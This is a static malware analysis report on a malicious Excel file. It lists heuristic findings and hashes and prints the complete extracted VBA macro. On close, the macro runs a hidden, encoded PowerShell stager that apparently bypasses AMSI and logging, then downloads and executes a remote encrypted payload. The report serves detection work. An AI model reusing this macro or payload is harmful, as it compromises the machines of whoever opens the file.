Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 c38acd9f5e114a4f…

MALICIOUS

Office (OOXML)

18.7 KB Created: 2021-04-05 10:01:50 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-07-10
MD5: f754559f862674fcf84b4dea7ea0a093 SHA-1: 50adddf88c5b4bd6689ac80a0ac1e5436f9b781b SHA-256: c38acd9f5e114a4f7f875b72b77e3a80a37758ef5186918bbd6dc6f1625bc8d9
228 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        NR = NR + "AoACQASQBWACsAJABLACkAKQB8AEkARQBYAA=="
    Set asd = CreateObject("WScript.Shell")
    asd.Run (NR)
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        Dim NR As String
    NR = "powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVg"
    NR = NR + "BFAFIAUwBJAG8AbgBUAGEAYgBMAGUALgBQAFMAVgBFAHIAcwBp"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        NR = NR + "AoACQASQBWACsAJABLACkAKQB8AEkARQBYAA=="
    Set asd = CreateObject("WScript.Shell")
    asd.Run (NR)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Attribute VB_Name = "Module1"
Sub AutoClose()
    ptp

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 7729 bytes
SHA-256: 560e1ea09c943a4e76dc83670cf06dc7a24bab931c01790c8936cc8193e5a4b5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub AutoClose()
    ptp
End Sub

Public Function ptp() As Variant
    Dim NR As String
    NR = "powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVg"
    NR = NR + "BFAFIAUwBJAG8AbgBUAGEAYgBMAGUALgBQAFMAVgBFAHIAcwBp"
    NR = NR + "AE8AbgAuAE0AQQBqAE8AUgAgAC0AZwBlACAAMwApAHsAJAA4AD"
    NR = NR + "IAMgA9AFsAUgBlAEYAXQAuAEEAcwBTAGUAbQBCAGwAeQAuAEcA"
    NR = NR + "ZQB0AFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQ"
    NR = NR + "BnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBV"
    NR = NR + "AHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAGkARQBgAGwARAAiAC"
    NR = NR + "gAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkA"
    NR = NR + "UwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQ"
    NR = NR + "BiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJAA4"
    NR = NR + "ADIAMgApAHsAJAAxADkAMQA9ACQAOAAyADIALgBHAGUAVABWAE"
    NR = NR + "EAbAB1AEUAKAAkAG4AdQBMAGwAKQA7AEkARgAoACQAMQA5ADEA"
    NR = NR + "WwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZw"
    NR = NR + "BnAGkAbgBnACcAXQApAHsAJAAxADkAMQBbACcAUwBjAHIAaQBw"
    NR = NR + "AHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAF"
    NR = NR + "sAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwA"
    NR = NR + "bwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAAxADkAMQ"
    NR = NR + "BbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBn"
    NR = NR + "AGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAH"
    NR = NR + "AAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8A"
    NR = NR + "ZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAYQBsAD0AWwBDAE8AbA"
    NR = NR + "BsAEUAQwBUAEkATwBOAHMALgBHAGUAbgBFAHIASQBjAC4ARABJ"
    NR = NR + "AEMAVABpAE8AbgBhAFIAeQBbAHMAVABSAGkAbgBHACwAUwBZAF"
    NR = NR + "MAVABlAE0ALgBPAEIASgBFAGMAVABdAF0AOgA6AE4AZQBXACgA"
    NR = NR + "KQA7ACQAdgBBAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUw"
    NR = NR + "BjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBu"
    NR = NR + "AGcAJwAsADAAKQA7ACQAVgBhAEwALgBBAGQARAAoACcARQBuAG"
    NR = NR + "EAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8A"
    NR = NR + "YwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJA"
    NR = NR + "AxADkAMQBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBD"
    NR = NR + "AEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAG"
    NR = NR + "MAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQA"
    NR = NR + "bwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQ"
    NR = NR + "BwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBd"
    NR = NR + "AD0AJAB2AGEAbAB9AEUAbABTAGUAewBbAFMAYwBSAEkAUAB0AE"
    NR = NR + "IATABPAGMAawBdAC4AIgBHAGUAdABGAEkAZQBgAEwAZAAiACgA"
    NR = NR + "JwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbw"
    NR = NR + "BuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBl"
    NR = NR + "AFQAVgBBAGwAVQBlACgAJABuAFUAbABMACwAKABOAGUAdwAtAE"
    NR = NR + "8AYgBqAEUAYwBUACAAQwBPAEwAbABlAEMAdABpAE8AbgBTAC4A"
    NR = NR + "RwBFAE4AZQBSAGkAYwAuAEgAQQBTAGgAUwBlAFQAWwBTAFQAcg"
    NR = NR + "BJAE4AZwBdACkAKQB9ACQAUgBFAEYAPQBbAFIARQBmAF0ALgBB"
    NR = NR + "AFMAcwBlAE0AQgBMAHkALgBHAGUAdABUAHkAUABlACgAJwBTAH"
    NR = NR + "kAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUA"
    NR = NR + "dABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQ"
    NR = NR + "BsAHMAJwApADsAJABSAEUARgAuAEcARQB0AEYAaQBlAEwARAAo"
    NR = NR + "ACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkAC"
    NR = NR + "cALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMA"
    NR = NR + "JwApAC4AUwBFAFQAVgBhAGwAdQBlACgAJABuAFUAbABMACwAJA"
    NR = NR + "BUAFIAdQBlACkAOwB9ADsAWwBTAFkAUwB0AGUAbQAuAE4AZQB0"
    NR = NR + "AC4AUwBlAHIAVgBJAGMAZQBQAE8AaQBOAFQATQBhAG4AYQBnAE"
    NR = NR + "UAcgBdADoAOgBFAHgAcABlAGMAdAAxADAAMABDAE8AbgBUAEkA"
    NR = NR + "bgB1AGUAPQAwADsAJAA1ADYANgA9AE4ARQBXAC0ATwBCAEoARQ"
    NR = NR + "BjAHQAIABTAHkAUwB0AGUATQAuAE4ARQB0AC4AVwBFAEIAQwBs"
    NR = NR + "AEkARQBOAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC"
    NR = NR + "4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsA"
    NR = NR + "IABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMA"
    NR = NR + "A7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBj"
    NR = NR + "AGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQAZQB4AHQALgBFAG"
    NR = NR + "4AQwBPAGQASQBOAEcAXQA6ADoAVQBOAGkAYwBPAEQAZQAuAEcA"
    NR = NR + "RQB0AFMAdAByAEkAbgBnACgAWwBDAG8AbgB2AGUAUgB0AF0AOg"
    NR = NR + "A6AEYAUgBPAG0AQgBBAFMARQA2ADQAUwBUAHIAaQBuAGcAKAAn"
    NR = NR + "AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AE"
    NR = NR + "EAeABBAEQAYwBBAE0AZwBBAHUAQQBEAEkAQQBNAEEAQQB1AEEA"
    NR = NR + "RABFAEEATQBBAEEAdQBBAEQASQBBAE8AZwBBAHgAQQBEAEkAQQ"
    NR = NR + "BNAHcAQQAwAEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBh"
    NR = NR + "AGQAbQBpAG4ALwBnAGUAdAAuAHAAaABwACcAOwAkADUANgA2AC"
    NR = NR + "4ASABFAGEARABlAHIAUwAuAEEAZABkACgAJwBVAHMAZQByAC0A"
    NR = NR + "QQBnAGUAbgB0ACcALAAkAHUAKQA7ACQANQA2ADYALgBQAFIAbw"
    NR = NR + "B4AFkAPQBbAFMAeQBTAHQAZQBNAC4ATgBFAFQALgBXAGUAYgBS"
    NR = NR + "AGUAcQBVAGUAUwBUAF0AOgA6AEQARQBGAGEAdQBMAHQAVwBlAE"
    NR = NR + "IAUABSAG8AWAB5ADsAJAA1ADYANgAuAFAAUgBvAHgAeQAuAEMA"
    NR = NR + "cgBlAGQAZQBuAHQAaQBhAEwAcwAgAD0AIABbAFMAWQBTAHQARQ"
    NR = NR + "BNAC4ATgBlAFQALgBDAFIAZQBEAGUATgBUAGkAQQBsAEMAQQBj"
    NR = NR + "AEgARQBdADoAOgBEAEUAZgBhAFUATABUAE4ARQBUAFcATwBSAE"
    NR = NR + "sAQwBSAGUARABlAG4AdABpAEEATABzADsAJABTAGMAcgBpAHAA"
    NR = NR + "dAA6AFAAcgBvAHgAeQAgAD0AIAAkADUANgA2AC4AUAByAG8AeA"
    NR = NR + "B5ADsAJABLAD0AWwBTAFkAcwB0AEUAbQAuAFQARQBYAHQALgBF"
    NR = NR + "AE4AYwBPAGQAaQBOAEcAXQA6ADoAQQBTAEMASQBJAC4ARwBFAF"
    NR = NR + "QAQgB5AHQAZQBzACgAJwBCAE8AagBQAFgAKwBLAEoALwA+AD0A"
    NR = NR + "bAAuAFEANABxAHcAJQBFADgAegBEAHkAbQByACYAVwBeAGQAPA"
    NR = NR + "BBAEgAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBn"
    NR = NR + "AFMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AH"
    NR = NR + "wAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsA"
    NR = NR + "WwAkAF8AJQAkAEsALgBDAG8AdQBuAFQAXQApACUAMgA1ADYAOw"
    NR = NR + "AkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABK"
    NR = NR + "AF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9AC"
    NR = NR + "gAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQA"
    NR = NR + "UwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJA"
    NR = NR + "BTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBd"
    NR = NR + "ADsAJABfAC0AQgBYAG8AcgAkAFMAWwAoACQAUwBbACQASQBdAC"
    NR = NR + "sAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAA1ADYA"
    NR = NR + "NgAuAEgARQBBAGQAZQBSAHMALgBBAGQAZAAoACIAQwBvAG8Aaw"
    NR = NR + "BpAGUAIgAsACIAVQB4AHQAZQBtAGcAZABJAGcATQA9AFUASABF"
    NR = NR + "AHgALwBuAHAAMQBYAGwANABTAHAASgBaAG0AUgAyAFUANwByAG"
    NR = NR + "8AMwBrAHYAUQAwAD0AIgApADsAJABEAEEAdABhAD0AJAA1ADYA"
    NR = NR + "NgAuAEQAbwB3AE4AbABPAGEARABEAGEAdABBACgAJABzAEUAUg"
    NR = NR + "ArACQAdAApADsAJABpAFYAPQAkAGQAQQB0AEEAWwAwAC4ALgAz"
    NR = NR + "AF0AOwAkAEQAYQB0AEEAPQAkAEQAYQB0AGEAWwA0AC4ALgAkAE"
    NR = NR + "QAYQB0AGEALgBsAEUAbgBHAHQASABdADsALQBKAE8ASQBuAFsA"
    NR = NR + "QwBoAEEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAQQBUAGEAIA"
    NR = NR + "AoACQASQBWACsAJABLACkAKQB8AEkARQBYAA=="
    Set asd = CreateObject("WScript.Shell")
    asd.Run (NR)
End Function


Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 24064 bytes
SHA-256: 7d31de6d4b0f39012ce59348177fa68bdcf0e7da3100dd403db9c1feede3539d

Open this report in the interactive analyzer, or submit your own file for analysis.